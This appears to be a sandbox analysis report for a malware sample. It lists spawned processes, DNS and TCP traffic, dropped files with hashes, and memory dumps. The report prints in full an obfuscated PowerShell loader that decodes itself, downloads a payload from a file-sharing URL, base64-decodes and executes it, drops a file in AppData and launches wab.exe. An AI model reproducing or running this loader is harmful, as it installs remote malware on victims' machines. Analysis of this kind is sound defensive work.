Ejeru .uggr Spil. skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol (Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene 'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol (Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene 't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe SunbcBlowjtGerha Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane Ejeru .uggr Spil. skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol (Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene 'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol (Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene 't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 www.sendspace.com udp
US 172.67.170.105:443 www.sendspace.com tcp
US 8.8.8.8:53 fs13n3.sendspace.com udp
CA 69.31.136.57:443 fs13n3.sendspace.com tcp
US 8.8.8.8:53 105.170.67.172.in-addr.arpa udp
US 8.8.8.8:53 crt.sectigo.com udp
US 172.64.149.23:80 crt.sectigo.com tcp
US 8.8.8.8:53 57.136.31.69.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 172.67.170.105:443 www.sendspace.com tcp
US 8.8.8.8:53 fs12n2.sendspace.com udp
CA 69.31.136.53:443 fs12n2.sendspace.com tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 53.136.31.69.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/748-0-0x00007FFD5B113000-0x00007FFD5B115000-memory.dmp

memory/748-1-0x000001BD8C230000-0x000001BD8C252000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_naqtrgwg.dks.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/748-11-0x00007FFD5B110000-0x00007FFD5BBD1000-memory.dmp

memory/748-12-0x00007FFD5B110000-0x00007FFD5BBD1000-memory.dmp

memory/748-13-0x00007FFD5B110000-0x00007FFD5BBD1000-memory.dmp

memory/872-22-0x0000000002EC0000-0x0000000002EF6000-memory.dmp

memory/872-23-0x0000000005B90000-0x00000000061B8000-memory.dmp

memory/872-24-0x0000000005940000-0x0000000005962000-memory.dmp

memory/872-25-0x0000000005AA0000-0x0000000005B06000-memory.dmp

memory/872-26-0x0000000005B10000-0x0000000005B76000-memory.dmp

memory/872-36-0x00000000061C0000-0x0000000006514000-memory.dmp

memory/872-37-0x00000000067D0000-0x00000000067EE000-memory.dmp

memory/872-38-0x0000000006800000-0x000000000684C000-memory.dmp

memory/872-39-0x0000000008050000-0x00000000086CA000-memory.dmp

memory/872-40-0x0000000006D60000-0x0000000006D7A000-memory.dmp

memory/872-41-0x0000000007A70000-0x0000000007B06000-memory.dmp

memory/872-42-0x0000000006DD0000-0x0000000006DF2000-memory.dmp

memory/872-43-0x0000000008C80000-0x0000000009224000-memory.dmp

C:\Users\Admin\AppData\Roaming\Omrystninger.Dim

MD5 6d9b6accceeb8d1903ff212fe516a08e
SHA1 dde8ef0bd8cee4dd7593de179183a6a0afb5e1cc
SHA256 2f65e63154ec396206d3ca6ce8ac0210b09598f0c61e6038161ad66fb5e80138
SHA512 48031eff35c6ef2dc0c05e750ddc960c6031fbb16f41843f0f0c01a0c59d76b71283793428f20974800ff880555606d6fbb4e1ad8f48220a38e9725ed6eac420

memory/872-45-0x0000000009230000-0x000000000E827000-memory.dmp

memory/748-46-0x00007FFD5B113000-0x00007FFD5B115000-memory.dmp

memory/748-47-0x00007FFD5B110000-0x00007FFD5BBD1000-memory.dmp

memory/412-64-0x0000000000890000-0x0000000001AE4000-memory.dmp

memory/412-65-0x0000000000890000-0x0000000001AE4000-memory.dmp

memory/748-70-0x00007FFD5B110000-0x00007FFD5BBD1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3582-490\wab.exe

MD5 72ad21d191b58842334d32a381ea7fa8
SHA1 f7375f09855a7bce9f7a152c75e84aac69caf828
SHA256 87abfab7bf5e213fc9e63c7fa39edfa6452eb5f7fdd668cd370d9cf4ea3ef729
SHA512 78662231c7ce0d03374b69dfd32614786dc5bf0c8ad2baadf2143f42bb03bd378632cc457dc414aa7e3d284674cc9151c39f90d71d9a5dd15dba689b2283386d

C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE

MD5 0a1704e48ff603332eaac935608d3cf1
SHA1 e138d3d481c054a89b85312bfddd2f8a0baf8c1b
SHA256 d9e02af7b220e25f385c71e0a3be4b83203e0673cc1e56fcf02d3e1f0f3774b6
SHA512 7cec7a7c5542e66e347381e9ab5572b2231ab11dac61d9a76bcb7cbd4bd1e86f8169e7840c2e69f93e686cc1834e52cd6b47817b760ea618139a3de64076314f

memory/412-165-0x0000000000890000-0x0000000001AE4000-memory.dmp

memory/412-166-0x0000000000890000-0x0000000001AE4000-memory.dmp

memory/412-168-0x0000000000890000-0x0000000001AE4000-memory.dmp